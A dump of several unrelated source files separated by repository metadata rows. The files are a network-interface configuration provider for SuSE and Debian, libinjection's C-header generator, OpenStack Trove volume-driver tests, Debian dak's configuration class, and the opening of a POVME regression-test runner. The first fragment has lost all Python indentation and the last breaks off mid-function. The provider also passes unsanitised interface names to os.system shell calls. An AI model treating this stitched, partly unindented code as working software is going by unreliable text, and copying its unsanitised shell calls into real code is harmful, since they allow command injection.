if self.ifcfg_v4_dict['BOOTPROTO='] != 'static':
bootproto='Automatic'
else:
bootproto='Static'
gateway=''
# The gateway line here for SuSE is 'default <addr> <interface>'.
# Remove the <interface> so it can match <addr>.
if len(self.gateway_dict['default ']) >0:
gateway=self.gateway_dict['default '].split(' ')[0]
return self.ifcfg_dict['IPADDR='],self.ifcfg_file.split('-')[-1],bootproto,gateway,Ensure,PrefixLength,AddressFamily
def restart_network(self,Interface):
os.system('ifdown ' + Interface)
os.system('ifup ' + Interface)
return [0]
class debianDistro(AbstractDistro):
def __init__(self):
super(debianDistro,self).__init__()
self.ifcfg_prefix=''
self.gateway_prefix=''
self.ifcfg_file='/etc/network/interfaces'
self.gateway_file='/etc/network/interfaces'
def init_re_dict(self,src_dict):
re_dict=dict()
for k in src_dict:
re_dict[k]=re.compile(r'\s*'+k+'.*')
if 'iface ' in re_dict:
re_dict['iface ']=re.compile(r'\s*iface '+src_dict['iface '])
if 'inet ' in re_dict:
re_dict['inet ']=re.compile(r'\s*iface '+src_dict['iface '] + ' inet .*')
if 'inet6 ' in re_dict:
re_dict['inet6 ']=re.compile(r'\s*iface '+src_dict['iface '] + ' inet6 .*')
return re_dict
def init_src_dicts(self,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
self.ifcfg_v4_dict={}
self.ifcfg_v6_dict={}
self.gateway_dict={}
if BootProtocol.lower() == 'static' :
self.ifcfg_v4_dict['inet '] = 'static'
elif BootProtocol.lower() == 'automatic':
self.ifcfg_v4_dict['inet '] = 'dhcp'
else:
self.ifcfg_v4_dict['inet '] = ''
self.ifcfg_v4_dict['iface ']=InterfaceName
self.ifcfg_v4_dict['autoconf ']=''
self.ifcfg_v4_dict['network ']=''
self.ifcfg_v4_dict['address ']=IPAddress
if PrefixLength !=0 and PrefixLength != '':
self.ifcfg_v4_dict['netmask ']=bitNetmaskConversion(PrefixLength)
self.ifcfg_v6_dict['netmask ']=str(PrefixLength)
else:
self.ifcfg_v4_dict['netmask ']=''
self.ifcfg_v6_dict['netmask ']=''
self.ifcfg_v4_dict['gateway ']=DefaultGateway
if len(BootProtocol) > 0:
self.ifcfg_v6_dict['inet6 ']='static' # static is used for autoconf as well
else:
self.ifcfg_v6_dict['inet6 ']=''
self.ifcfg_v6_dict['iface ']=InterfaceName
if PrefixLength !=0 and PrefixLength != '':
self.ifcfg_v6_dict['address ']=IPAddress
else:
self.ifcfg_v6_dict['address ']=IPAddress
self.ifcfg_v6_dict['gateway ']=DefaultGateway
if AddressFamily == "IPv4":
self.ifcfg_dict=self.ifcfg_v4_dict
self.inet='inet '
else:
if BootProtocol.lower() != 'static':
self.ifcfg_v6_dict['autoconf ']='1'
else:
self.ifcfg_v6_dict['autoconf ']='0'
self.ifcfg_dict=self.ifcfg_v6_dict
self.inet='inet6 '
if Ensure == "Absent":
auto='auto '+InterfaceName
self.ifcfg_dict[auto]=''
def src_dicts_to_params(self,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
inet=''
if BootProtocol != None and len(BootProtocol) > 0 :
if AddressFamily=='IPv6':
if self.ifcfg_dict['autoconf '] == '1' :
inet = 'Automatic'
else:
inet = 'Static'
else:
if self.ifcfg_dict[self.inet] == 'dhcp':
inet = 'Automatic'
else:
inet = 'Static'
if AddressFamily=='IPv4':
if 'netmask' in self.ifcfg_dict.keys() and len(self.ifcfg_dict['netmask']) > 0 :
PrefixLength=netmaskBitConversion(self.ifcfg_dict['netmask'])
elif PrefixLength != '' and PrefixLength > 0 and '/' in self.ifcfg_dict['address '] :
PrefixLength=int(self.ifcfg_dict['address '].split('/')[1])
self.ifcfg_dict['address ']=self.ifcfg_dict['address '].split('/')[0]
gateway=''
if len(self.ifcfg_dict['gateway ']) >0:
gateway=self.ifcfg_dict['gateway ']
return self.ifcfg_dict['address '],self.ifcfg_dict['iface '],inet,gateway,Ensure,PrefixLength,AddressFamily
def restart_network(self,Interface):
os.system('ifdown --exclude=lo ' + Interface +'; ifup --exclude=lo '+ Interface)
return [0]
def UpdateValuesInFile(self,fname,src_dict,re_dict,Ensure):
if len(src_dict) == 0:
return [0]
removing=False
if self.inet in src_dict.keys() and Ensure=='Absent': # we are trying to remove
removing=True
if removing == False and os.path.exists(fname) != True:
# if this file is not here - we will create it
try:
F = open(fname,'w+')
F.write('# Created by nxIPAddress DSC PRovider\n')
F.close()
except:
raise
try:
F = open(fname,'r')
txt=F.read()
if 'iface ' in src_dict.keys():
srch=r'(^auto '+src_dict['iface ']+'$.*?^iface '+src_dict['iface ']+'.*?$|^iface '+src_dict['iface ']+'.*?$).*?((^auto )|(^iface )|(^$))'
updated=''
r=re.search(srch,txt,flags=re.S|re.M)
if r == None:
if removing: #nothing to remove
return [0]
else : # append values to the end
l='auto ' + src_dict['iface '] + '\niface '+src_dict['iface '] + ' ' + self.inet+src_dict[self.inet] + '\n'
if len(updated) > 0 and updated[-1] != '\n':
updated+='\n'
updated+=l
re_dict['iface ']=None
re_dict[self.inet]=None
for k in re_dict:
if re_dict[k] != None and len(src_dict[k]) > 0 :
l=k+src_dict[k]+'\n'
updated+=l
txt=txt+updated
else: #matched
if removing:
tail=''
rpl=re.compile(r.group(0),flags=re.S|re.M)
txt=rpl.sub(tail,txt)
if txt[-2:] == '\n\n':
txt=txt[:-1]
else : # replace tags - preserve unknown tags
t=r.group(0)
for l in t.splitlines():
if len(l)>1:
l+='\n'
else:
continue
if 'iface ' in re_dict.keys() and re_dict['iface '] != None :
if re.match(re_dict['iface '],l) :
l='iface '+src_dict['iface '] + ' ' + self.inet+src_dict[self.inet] + '\n'
re_dict['iface ']=None
re_dict[self.inet]=None
updated+=l
continue
for k in re_dict.keys():
if re_dict[k]!=None:
if re.match(re_dict[k],l): # re.match is anchored to the line start.
if len(src_dict[k])==0 :
l=''
else:
l=re.sub(re_dict[k],k+src_dict[k],l)
if len(l)>0 and l[-1]!='\n':
l+='\n'
re_dict[k]=None
break
if len(l)>2:
updated+=l
for k in re_dict:
if re_dict[k] != None and len(src_dict[k]) > 0 :
l=k+src_dict[k]+'\n'
updated+=l
tail=''
if updated[-1] != '\n':
tail='\n'
updated+=tail
rpl=re.compile(r.group(0),flags=re.S|re.M)
txt=rpl.sub(updated,txt)
if txt[-2:] == '\n\n':
txt=txt[:-1]
F.close()
except:
raise
ReplaceFileContentsAtomic(fname,txt)
return [0]
def GetValuesFromFile(self,fname,src_dict,re_dict):
if os.path.exists(fname) != True:
return
try:
F = open(fname,'r')
txt=F.read()
if 'iface ' in src_dict.keys():
srch=r'(^auto '+src_dict['iface ']+'$.*?^iface '+src_dict['iface ']+'.*?$|^iface '+src_dict['iface ']+'.*?$).*?((^auto )|(^iface )|(^$))'
r=re.search(srch,txt,flags=re.S|re.M)
if r == None:
return
txt=r.group(0)
for l in txt.splitlines():
for k in re_dict:
if re_dict[k]!=None:
if re.match(re_dict[k],l): # re.match is anchored to the line start.
if k == self.inet:
src_dict[k]=l.split(k[-1])[3].strip('\n')
else:
src_dict[k]=l.split(k[-1])[1].strip('\n')
re_dict[k]=None
F.close()
except:
raise
class redhatDistro(AbstractDistro):
def __init__(self):
super(redhatDistro,self).__init__()
class centosDistro(redhatDistro):
def __init__(self):
super(centosDistro,self).__init__()
class UbuntuDistro(debianDistro):
def __init__(self):
super(UbuntuDistro,self).__init__()
class LinuxMintDistro(UbuntuDistro):
def __init__(self):
super(LinuxMintDistro,self).__init__()
class fedoraDistro(redhatDistro):
def __init__(self):
super(fedoraDistro,self).__init__()
| mit | 2,256,311,520,288,610,000 | 42.291667 | 201 | 0.559801 | false |
fengjian/libinjection | src/sqlparse2c.py | 3 | 3800 | #!/usr/bin/env python
#
# Copyright 2012, 2013 Nick Galbreath
# nickg@client9.com
# BSD License -- see COPYING.txt for details
#
"""
Converts a libinjection JSON data file to a C header (.h) file
"""
import sys
def toc(obj):
""" main routine """
print """
#ifndef LIBINJECTION_SQLI_DATA_H
#define LIBINJECTION_SQLI_DATA_H
#include "libinjection.h"
#include "libinjection_sqli.h"
typedef struct {
const char *word;
char type;
} keyword_t;
static size_t parse_money(sfilter * sf);
static size_t parse_other(sfilter * sf);
static size_t parse_white(sfilter * sf);
static size_t parse_operator1(sfilter *sf);
static size_t parse_char(sfilter *sf);
static size_t parse_hash(sfilter *sf);
static size_t parse_dash(sfilter *sf);
static size_t parse_slash(sfilter *sf);
static size_t parse_backslash(sfilter * sf);
static size_t parse_operator2(sfilter *sf);
static size_t parse_string(sfilter *sf);
static size_t parse_word(sfilter * sf);
static size_t parse_var(sfilter * sf);
static size_t parse_number(sfilter * sf);
static size_t parse_tick(sfilter * sf);
static size_t parse_ustring(sfilter * sf);
static size_t parse_qstring(sfilter * sf);
static size_t parse_nqstring(sfilter * sf);
static size_t parse_xstring(sfilter * sf);
static size_t parse_bstring(sfilter * sf);
static size_t parse_estring(sfilter * sf);
static size_t parse_bword(sfilter * sf);
"""
#
# Mapping of character to function
#
fnmap = {
'CHAR_WORD' : 'parse_word',
'CHAR_WHITE': 'parse_white',
'CHAR_OP1' : 'parse_operator1',
'CHAR_UNARY': 'parse_operator1',
'CHAR_OP2' : 'parse_operator2',
'CHAR_BANG' : 'parse_operator2',
'CHAR_BACK' : 'parse_backslash',
'CHAR_DASH' : 'parse_dash',
'CHAR_STR' : 'parse_string',
'CHAR_HASH' : 'parse_hash',
'CHAR_NUM' : 'parse_number',
'CHAR_SLASH': 'parse_slash',
'CHAR_SEMICOLON' : 'parse_char',
'CHAR_COMMA': 'parse_char',
'CHAR_LEFTPARENS': 'parse_char',
'CHAR_RIGHTPARENS': 'parse_char',
'CHAR_LEFTBRACE': 'parse_char',
'CHAR_RIGHTBRACE': 'parse_char',
'CHAR_VAR' : 'parse_var',
'CHAR_OTHER': 'parse_other',
'CHAR_MONEY': 'parse_money',
'CHAR_TICK' : 'parse_tick',
'CHAR_UNDERSCORE': 'parse_underscore',
'CHAR_USTRING' : 'parse_ustring',
'CHAR_QSTRING' : 'parse_qstring',
'CHAR_NQSTRING' : 'parse_nqstring',
'CHAR_XSTRING' : 'parse_xstring',
'CHAR_BSTRING' : 'parse_bstring',
'CHAR_ESTRING' : 'parse_estring',
'CHAR_BWORD' : 'parse_bword'
}
print
print "typedef size_t (*pt2Function)(sfilter *sf);"
print "static const pt2Function char_parse_map[] = {"
pos = 0
for character in obj['charmap']:
print " &%s, /* %d */" % (fnmap[character], pos)
pos += 1
print "};"
print
# keywords
# load them
keywords = obj['keywords']
for fingerprint in list(obj[u'fingerprints']):
fingerprint = '0' + fingerprint.upper()
keywords[fingerprint] = 'F'
needhelp = []
for key in keywords.iterkeys():
if key != key.upper():
needhelp.append(key)
for key in needhelp:
tmpv = keywords[key]
del keywords[key]
keywords[key.upper()] = tmpv
print "static const keyword_t sql_keywords[] = {"
for k in sorted(keywords.keys()):
if len(k) > 31:
sys.stderr.write("ERROR: keyword greater than 32 chars\n")
sys.exit(1)
print " {\"%s\", '%s'}," % (k, keywords[k])
print "};"
print "static const size_t sql_keywords_sz = %d;" % (len(keywords), )
print "#endif"
return 0
if __name__ == '__main__':
import json
sys.exit(toc(json.load(sys.stdin)))
| bsd-3-clause | -4,710,446,708,618,401,000 | 27.787879 | 73 | 0.604211 | false |
zhangg/trove | integration/tests/integration/tests/volumes/driver.py | 1 | 21014 | # Copyright (c) 2012 OpenStack, LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from numbers import Number
import os
import re
import shutil
import six
import socket
import time
import unittest
import pexpect
from proboscis import test
from proboscis.asserts import assert_raises
from proboscis.decorators import expect_exception
from proboscis.decorators import time_out
from trove.tests.config import CONFIG
from trove.common.utils import poll_until
from trove.tests.util import process
from trove.common.utils import import_class
from tests import initialize
WHITE_BOX = CONFIG.white_box
VOLUMES_DRIVER = "trove.volumes.driver"
if WHITE_BOX:
# TODO(tim.simpson): Restore this once white box functionality can be
# added back to this test module.
pass
# from nova import context
# from nova import exception
# from nova import flags
# from nova import utils
# from trove import exception as trove_exception
# from trove.utils import poll_until
# from trove import volume
# from trove.tests.volume import driver as test_driver
# FLAGS = flags.FLAGS
UUID_PATTERN = re.compile('^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-'
'[0-9a-f]{4}-[0-9a-f]{12}$')
HUGE_VOLUME = 5000
def is_uuid(text):
return UUID_PATTERN.search(text) is not None
class StoryDetails(object):
def __init__(self):
self.api = volume.API()
self.client = volume.Client()
self.context = context.get_admin_context()
self.device_path = None
self.volume_desc = None
self.volume_id = None
self.volume_name = None
self.volume = None
self.host = socket.gethostname()
self.original_uuid = None
self.original_device_info = None
self.resize_volume_size = 2
def get_volume(self):
return self.api.get(self.context, self.volume_id)
@property
def mount_point(self):
return "%s/%s" % (LOCAL_MOUNT_PATH, self.volume_id)
@property
def test_mount_file_path(self):
return "%s/test.txt" % self.mount_point
story = None
storyFail = None
LOCAL_MOUNT_PATH = "/testsmnt"
class VolumeTest(unittest.TestCase):
"""This test tells the story of a volume, from cradle to grave."""
def __init__(self, *args, **kwargs):
unittest.TestCase.__init__(self, *args, **kwargs)
def setUp(self):
global story, storyFail
self.story = story
self.storyFail = storyFail
def assert_volume_as_expected(self, volume):
self.assertIsInstance(volume["id"], Number)
self.assertEqual(self.story.volume_name, volume["display_name"])
self.assertEqual(self.story.volume_desc, volume["display_description"])
self.assertEqual(1, volume["size"])
self.assertEqual(self.story.context.user_id, volume["user_id"])
self.assertEqual(self.story.context.project_id, volume["project_id"])
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[initialize.start_volume])
class SetUp(VolumeTest):
def test_05_create_story(self):
"""Creating 'story' vars used by the rest of these tests."""
global story, storyFail
story = StoryDetails()
storyFail = StoryDetails()
@time_out(60)
def test_10_wait_for_topics(self):
"""Wait until the volume topic is up before proceeding."""
topics = ["volume"]
from tests.util.topics import hosts_up
while not all(hosts_up(topic) for topic in topics):
pass
def test_20_refresh_local_folders(self):
"""Delete the local folders used as mount locations if they exist."""
if os.path.exists(LOCAL_MOUNT_PATH):
#TODO(rnirmal): Also need to remove any existing mounts.
shutil.rmtree(LOCAL_MOUNT_PATH)
os.mkdir(LOCAL_MOUNT_PATH)
# Give some time for the services to startup
time.sleep(10)
@time_out(60)
def test_30_mgmt_volume_check(self):
"""Get the volume information from the mgmt API"""
story_context = self.story.context
device_info = self.story.api.get_storage_device_info(story_context)
print("device_info : %r" % device_info)
self.assertNotEqual(device_info, None,
"the storage device information should exist")
self.story.original_device_info = device_info
@time_out(60)
def test_31_mgmt_volume_info(self):
"""Check the available space against the mgmt API info."""
story_context = self.story.context
device_info = self.story.api.get_storage_device_info(story_context)
print("device_info : %r" % device_info)
info = {'spaceTotal': device_info['raw_total'],
'spaceAvail': device_info['raw_avail']}
self._assert_available_space(info)
def _assert_available_space(self, device_info, fail=False):
"""
Give the SAN device_info(fake or not) and get the asserts for free
"""
print("DEVICE_INFO on SAN : %r" % device_info)
# Calculate the GBs; Divide by 2 for the FLAGS.san_network_raid_factor
gbs = 1.0 / 1024 / 1024 / 1024 / 2
total = int(device_info['spaceTotal']) * gbs
free = int(device_info['spaceAvail']) * gbs
used = total - free
usable = total * (FLAGS.san_max_provision_percent * 0.01)
real_free = float(int(usable - used))
print("total : %r" % total)
print("free : %r" % free)
print("used : %r" % used)
print("usable : %r" % usable)
print("real_free : %r" % real_free)
check_space = self.story.api.check_for_available_space
self.assertFalse(check_space(self.story.context, HUGE_VOLUME))
self.assertFalse(check_space(self.story.context, real_free + 1))
if fail:
self.assertFalse(check_space(self.story.context, real_free))
self.assertFalse(check_space(self.story.context, real_free - 1))
self.assertFalse(check_space(self.story.context, 1))
else:
self.assertTrue(check_space(self.story.context, real_free))
self.assertTrue(check_space(self.story.context, real_free - 1))
self.assertTrue(check_space(self.story.context, 1))
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[SetUp])
class AddVolumeFailure(VolumeTest):
@time_out(60)
def test_add(self):
"""
Make call to FAIL a prov. volume and assert the return value is a
FAILURE.
"""
self.assertIsNone(self.storyFail.volume_id)
name = "TestVolume"
desc = "A volume that was created for testing."
self.storyFail.volume_name = name
self.storyFail.volume_desc = desc
volume = self.storyFail.api.create(self.storyFail.context,
size=HUGE_VOLUME,
snapshot_id=None, name=name,
description=desc)
self.assertEqual(HUGE_VOLUME, volume["size"])
self.assertTrue("creating", volume["status"])
self.assertTrue("detached", volume["attach_status"])
self.storyFail.volume = volume
self.storyFail.volume_id = volume["id"]
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[AddVolumeFailure])
class AfterVolumeFailureIsAdded(VolumeTest):
"""Check that the volume can be retrieved via the API, and setup.
All we want to see returned is a list-like with an initial string.
"""
@time_out(120)
def test_api_get(self):
"""Wait until the volume is a FAILURE."""
volume = poll_until(lambda: self.storyFail.get_volume(),
lambda volume: volume["status"] != "creating")
self.assertEqual(volume["status"], "error")
self.assertTrue(volume["attach_status"], "detached")
@time_out(60)
def test_mgmt_volume_check(self):
"""Get the volume information from the mgmt API"""
info = self.story.api.get_storage_device_info(self.story.context)
print("device_info : %r" % info)
self.assertNotEqual(info, None,
"the storage device information should exist")
self.assertEqual(self.story.original_device_info['raw_total'],
info['raw_total'])
self.assertEqual(self.story.original_device_info['raw_avail'],
info['raw_avail'])
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[SetUp])
class AddVolume(VolumeTest):
@time_out(60)
def test_add(self):
"""Make call to prov. a volume and assert the return value is OK."""
self.assertIsNone(self.story.volume_id)
name = "TestVolume"
desc = "A volume that was created for testing."
self.story.volume_name = name
self.story.volume_desc = desc
volume = self.story.api.create(self.story.context, size=1,
snapshot_id=None, name=name,
description=desc)
self.assert_volume_as_expected(volume)
self.assertTrue("creating", volume["status"])
self.assertTrue("detached", volume["attach_status"])
self.story.volume = volume
self.story.volume_id = volume["id"]
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[AddVolume])
class AfterVolumeIsAdded(VolumeTest):
"""Check that the volume can be retrieved via the API, and setup.
All we want to see returned is a list-like with an initial string.
"""
@time_out(120)
def test_api_get(self):
"""Wait until the volume is finished provisioning."""
volume = poll_until(lambda: self.story.get_volume(),
lambda volume: volume["status"] != "creating")
self.assertEqual(volume["status"], "available")
self.assert_volume_as_expected(volume)
self.assertTrue(volume["attach_status"], "detached")
@time_out(60)
def test_mgmt_volume_check(self):
"""Get the volume information from the mgmt API"""
print("self.story.original_device_info : %r" %
self.story.original_device_info)
info = self.story.api.get_storage_device_info(self.story.context)
print("device_info : %r" % info)
self.assertNotEqual(info, None,
"the storage device information should exist")
self.assertEqual(self.story.original_device_info['raw_total'],
info['raw_total'])
volume_size = int(self.story.volume['size']) * (1024 ** 3) * 2
print("volume_size: %r" % volume_size)
print("self.story.volume['size']: %r" % self.story.volume['size'])
avail = int(self.story.original_device_info['raw_avail']) - volume_size
print("avail space: %r" % avail)
self.assertEqual(int(info['raw_avail']), avail)
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[AfterVolumeIsAdded])
class SetupVolume(VolumeTest):
@time_out(60)
def test_assign_volume(self):
"""Tell the volume it belongs to this host node."""
#TODO(tim.simpson) If this is important, could we add a test to
# make sure some kind of exception is thrown if it
# isn't added to certain drivers?
self.assertNotEqual(None, self.story.volume_id)
self.story.api.assign_to_compute(self.story.context,
self.story.volume_id,
self.story.host)
@time_out(60)
def test_setup_volume(self):
"""Set up the volume on this host. AKA discovery."""
self.assertNotEqual(None, self.story.volume_id)
device = self.story.client._setup_volume(self.story.context,
self.story.volume_id,
self.story.host)
if not isinstance(device, six.string_types):
self.fail("Expected device to be a string, but instead it was " +
str(type(device)) + ".")
self.story.device_path = device
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[SetupVolume])
class FormatVolume(VolumeTest):
@expect_exception(IOError)
@time_out(60)
def test_10_should_raise_IOError_if_format_fails(self):
"""
Tests that if the driver's _format method fails, its
public format method will perform an assertion properly, discover
it failed, and raise an exception.
"""
volume_driver_cls = import_class(FLAGS.volume_driver)
class BadFormatter(volume_driver_cls):
def _format(self, device_path):
pass
bad_client = volume.Client(volume_driver=BadFormatter())
bad_client._format(self.story.device_path)
@time_out(60)
def test_20_format(self):
self.assertNotEqual(None, self.story.device_path)
self.story.client._format(self.story.device_path)
def test_30_check_options(self):
cmd = ("sudo dumpe2fs -h %s 2> /dev/null | "
"awk -F ':' '{ if($1 == \"Reserved block count\") "
"{ rescnt=$2 } } { if($1 == \"Block count\") "
"{ blkcnt=$2 } } END { print (rescnt/blkcnt)*100 }'")
cmd = cmd % self.story.device_path
out, err = process(cmd)
self.assertEqual(float(5), round(float(out)), msg=out)
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[FormatVolume])
class MountVolume(VolumeTest):
@time_out(60)
def test_mount(self):
self.story.client._mount(self.story.device_path,
self.story.mount_point)
with open(self.story.test_mount_file_path, 'w') as file:
file.write("Yep, it's mounted alright.")
self.assertTrue(os.path.exists(self.story.test_mount_file_path))
def test_mount_options(self):
cmd = "mount -l | awk '/%s.*noatime/ { print $1 }'"
cmd %= LOCAL_MOUNT_PATH.replace('/', '')
out, err = process(cmd)
self.assertEqual(os.path.realpath(self.story.device_path), out.strip(),
msg=out)
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[MountVolume])
class ResizeVolume(VolumeTest):
@time_out(300)
def test_resize(self):
self.story.api.resize(self.story.context, self.story.volume_id,
self.story.resize_volume_size)
volume = poll_until(lambda: self.story.get_volume(),
lambda volume: volume["status"] == "resized")
self.assertEqual(volume["status"], "resized")
self.assertTrue(volume["attach_status"], "attached")
self.assertTrue(volume['size'], self.story.resize_volume_size)
@time_out(300)
def test_resizefs_rescan(self):
self.story.client.resize_fs(self.story.context,
self.story.volume_id)
expected = "trove.tests.volume.driver.ISCSITestDriver"
if FLAGS.volume_driver is expected:
size = self.story.resize_volume_size * \
test_driver.TESTS_VOLUME_SIZE_MULTIPLIER * 1024 * 1024
else:
size = self.story.resize_volume_size * 1024 * 1024
out, err = process('sudo blockdev --getsize64 %s' %
os.path.realpath(self.story.device_path))
if int(out) < (size * 0.8):
self.fail("Size %s is not more or less %s" % (out, size))
# Reset the volume status to available
self.story.api.update(self.story.context, self.story.volume_id,
{'status': 'available'})
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[MountVolume])
class UnmountVolume(VolumeTest):
@time_out(60)
def test_unmount(self):
self.story.client._unmount(self.story.mount_point)
child = pexpect.spawn("sudo mount %s" % self.story.mount_point)
child.expect("mount: can't find %s in" % self.story.mount_point)
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[UnmountVolume])
class GrabUuid(VolumeTest):
@time_out(60)
def test_uuid_must_match_pattern(self):
"""UUID must be hex chars in the form 8-4-4-4-12."""
client = self.story.client # volume.Client()
device_path = self.story.device_path # '/dev/sda5'
uuid = client.get_uuid(device_path)
self.story.original_uuid = uuid
self.assertTrue(is_uuid(uuid), "uuid must match regex")
@time_out(60)
def test_get_invalid_uuid(self):
"""DevicePathInvalidForUuid is raised if device_path is wrong."""
client = self.story.client
device_path = "gdfjghsfjkhggrsyiyerreygghdsghsdfjhf"
self.assertRaises(trove_exception.DevicePathInvalidForUuid,
client.get_uuid, device_path)
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[GrabUuid])
class RemoveVolume(VolumeTest):
@time_out(60)
def test_remove(self):
self.story.client.remove_volume(self.story.context,
self.story.volume_id,
self.story.host)
self.assertRaises(Exception,
self.story.client._format, self.story.device_path)
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[GrabUuid])
class Initialize(VolumeTest):
@time_out(300)
def test_10_initialize_will_format(self):
"""initialize will setup, format, and store the UUID of a volume"""
self.assertTrue(self.story.get_volume()['uuid'] is None)
self.story.client.initialize(self.story.context, self.story.volume_id,
self.story.host)
volume = self.story.get_volume()
self.assertTrue(is_uuid(volume['uuid']), "uuid must match regex")
self.assertNotEqual(self.story.original_uuid, volume['uuid'],
"Validate our assumption that the volume UUID "
"will change when the volume is formatted.")
self.story.client.remove_volume(self.story.context,
self.story.volume_id,
self.story.host)
@time_out(60)
def test_20_initialize_the_second_time_will_not_format(self):
"""If initialize is called but a UUID exists, it should not format."""
old_uuid = self.story.get_volume()['uuid']
self.assertTrue(old_uuid is not None)
class VolumeClientNoFmt(volume.Client):
def _format(self, device_path):
raise RuntimeError("_format should not be called!")
no_fmt_client = VolumeClientNoFmt()
no_fmt_client.initialize(self.story.context, self.story.volume_id,
self.story.host)
self.assertEqual(old_uuid, self.story.get_volume()['uuid'],
"UUID should be the same as no formatting occurred.")
self.story.client.remove_volume(self.story.context,
self.story.volume_id,
self.story.host)
def test_30_check_device_exists(self):
assert_raises(exception.InvalidDevicePath, self.story.client._format,
self.story.device_path)
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[Initialize])
class DeleteVolume(VolumeTest):
@time_out(60)
def test_delete(self):
self.story.api.delete(self.story.context, self.story.volume_id)
@test(groups=[VOLUMES_DRIVER], depends_on_classes=[DeleteVolume])
class ConfirmMissing(VolumeTest):
@time_out(60)
def test_discover_should_fail(self):
try:
self.story.client.driver.discover_volume(self.story.context,
self.story.volume)
self.fail("Expecting an error but did not get one.")
except exception.Error:
pass
except trove_exception.ISCSITargetNotDiscoverable:
pass
@time_out(60)
def test_get_missing_volume(self):
try:
volume = poll_until(lambda: self.story.api.get(self.story.context,
self.story.volume_id),
lambda volume: volume["status"] != "deleted")
self.assertEqual(volume["deleted"], False)
except exception.VolumeNotFound:
pass
| apache-2.0 | 7,793,867,989,542,511,000 | 37.416819 | 79 | 0.607452 | false |
haf/puppet-dak | daklib/config.py | 1 | 4474 | #!/usr/bin/env python
"""
Config access class
@contact: Debian FTPMaster <ftpmaster@debian.org>
@copyright: 2008 Mark Hymers <mhy@debian.org>
@license: GNU General Public License version 2 or later
"""
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
################################################################################
# <NCommander> mhy, how about "Now with 20% more monty python references"
################################################################################
import os
import apt_pkg
import socket
################################################################################
default_config = "/etc/dak/dak.conf" #: default dak config, defines host properties
# suppress some deprecation warnings in squeeze related to apt_pkg
# module
import warnings
warnings.filterwarnings('ignore', ".*apt_pkg.* is deprecated.*", DeprecationWarning)
################################################################################
def which_conf_file():
return os.getenv("DAK_CONFIG", default_config)
class Config(object):
"""
A Config object is a singleton containing
information about the DAK configuration
"""
__shared_state = {}
def __init__(self, *args, **kwargs):
self.__dict__ = self.__shared_state
if not getattr(self, 'initialised', False):
self.initialised = True
self._readconf()
self._setup_routines()
def _readconf(self):
apt_pkg.init()
self.Cnf = apt_pkg.Configuration()
apt_pkg.read_config_file_isc(self.Cnf, which_conf_file())
# Check whether our dak.conf was the real one or
# just a pointer to our main one
res = socket.gethostbyaddr(socket.gethostname())
conffile = self.Cnf.get("Config::" + res[0] + "::DakConfig")
if conffile:
apt_pkg.read_config_file_isc(self.Cnf, conffile)
# Rebind some functions
# TODO: Clean this up
self.get = self.Cnf.get
self.subtree = self.Cnf.subtree
self.value_list = self.Cnf.value_list
self.find = self.Cnf.find
self.find_b = self.Cnf.find_b
self.find_i = self.Cnf.find_i
def has_key(self, name):
return name in self.Cnf
def __contains__(self, name):
return name in self.Cnf
def __getitem__(self, name):
return self.Cnf[name]
def __setitem__(self, name, value):
self.Cnf[name] = value
@staticmethod
def get_db_value(name, default=None, rettype=None):
from daklib.dbconn import DBConfig, DBConn, NoResultFound
try:
res = DBConn().session().query(DBConfig).filter(DBConfig.name == name).one()
except NoResultFound:
return default
if rettype:
return rettype(res.value)
else:
return res.value
def _setup_routines(self):
"""
This routine is the canonical list of which fields need to exist in
the config table. If your dak instance is to work, we suggest reading it
Of course, what the values do is another matter
"""
for field in [('db_revision', None, int),
('defaultsuitename', 'unstable', str),
('exportpath', '', str)
]:
setattr(self, 'get_%s' % field[0], lambda s=None, x=field[0], y=field[1], z=field[2]: self.get_db_value(x, y, z))
setattr(Config, '%s' % field[0], property(fget=getattr(self, 'get_%s' % field[0])))
def get_defaultsuite(self):
from daklib.dbconn import get_suite
suitename = self.defaultsuitename
if not suitename:
return None
else:
return get_suite(suitename)
defaultsuite = property(get_defaultsuite)
| gpl-2.0 | 216,816,975,558,764,000 | 31.897059 | 125 | 0.583371 | false |
POVME/POVME | POVME/tests/runRegTests.py | 1 | 6020 | import glob
import contextlib
import os
#import filecmp
import difflib
import re
import subprocess
import time
import argparse
import sys
@contextlib.contextmanager
def Chdir(directory):
cwd = os.getcwd()
os.chdir(directory)
yield
os.chdir(cwd)
rawRegTests = open('regTests').readlines()
#Ignore commented out lines
rawRegTests = [i for i in rawRegTests if not i.strip()[0]=='#']
regTests = []
results = {}
arunPath = os.getcwd()+'/../arun'
regexFileName = "file_comparison_ignore_regex"
regexes_to_ignore = [i.strip() for i in open(regexFileName).readlines()]
def remove_regex_lines(list_of_lines):
lines_to_remove = set([])
for i, line in enumerate(list_of_lines):
